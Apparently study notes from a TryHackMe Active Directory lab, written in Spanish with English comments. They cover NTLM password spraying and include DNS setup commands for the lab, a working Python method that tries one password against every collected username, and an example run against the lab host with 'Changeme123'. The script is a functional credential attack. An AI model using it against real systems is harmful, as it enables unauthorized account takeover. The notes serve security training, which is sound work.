Teniendo una página que se autentica con NTLM, se puede hacer un password spray: probar una misma contraseña contra todos los usuarios que se pudieron recolectar.

A veces tenemos que configurar el DNS de la página para poder visualizarla: systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com

# Send DNS lookups for the breachad interface to the lab DC (10.200.20.101)
# and make za.tryhackme.com its search domain. This is per-link: lookups on
# other interfaces keep their existing resolver.
systemd-resolve --interface breachad --set-dns 10.200.20.101 --set-domain za.tryhackme.com

# Sanity check: the DC's hostname should now resolve through the resolver
# configured above before trying to reach any lab page.
nslookup thmdc.za.tryhackme.com

def password_spray(self, password, url):
    """Try one *password* against every collected username over NTLM HTTP auth.

    Sends one GET to *url* per entry in ``self.users``, authenticating with
    ``HttpNtlmAuth`` as ``<fqdn>\\<user>``, then classifies the HTTP status
    code against ``self.HTTP_AUTH_SUCCEED_CODE`` and, only when
    ``self.verbose`` is set, ``self.HTTP_AUTH_FAILED_CODE``. Results are
    reported on stdout; nothing is returned.

    Args:
        password: the single password tried for every username.
        url: the NTLM-protected endpoint to authenticate against.

    From the defender's side each iteration is one NTLM authentication
    attempt for a distinct account from the same client in a short interval;
    that "many accounts, one password, one source" shape is exactly what
    account-lockout thresholds and spray detections key on.
    """
    # NOTE(review): "[]" here looks like a rendering-stripped "[*]" marker;
    # kept byte-for-byte since it is runtime output.
    print("[] Starting passwords spray attack using the following password: " + password)
    found = 0
    for candidate in self.users:
        principal = self.fqdn + "\\" + candidate
        # No timeout is passed, so a stalled response blocks the whole loop.
        reply = requests.get(url, auth=HttpNtlmAuth(principal, password))
        code = reply.status_code
        if code == self.HTTP_AUTH_SUCCEED_CODE:
            found += 1
            print("[+] Valid credential pair found! Username: " + candidate + " Password: " + password)
        elif self.verbose and code == self.HTTP_AUTH_FAILED_CODE:
            print("[-] Failed login with Username: " + candidate)
    print("[] Password spray attack completed, " + str(found) + " valid credential pairs found")

# Usage template: -u file of collected usernames, -f the domain FQDN used as
# the NTLM domain prefix, -p the single password to try, -a the NTLM-protected
# URL to authenticate against.
python ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>

# Example run in the lab: one password (Changeme123) tried for every name in
# usernames.txt against the lab's NTLM-authenticated page.
python ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com/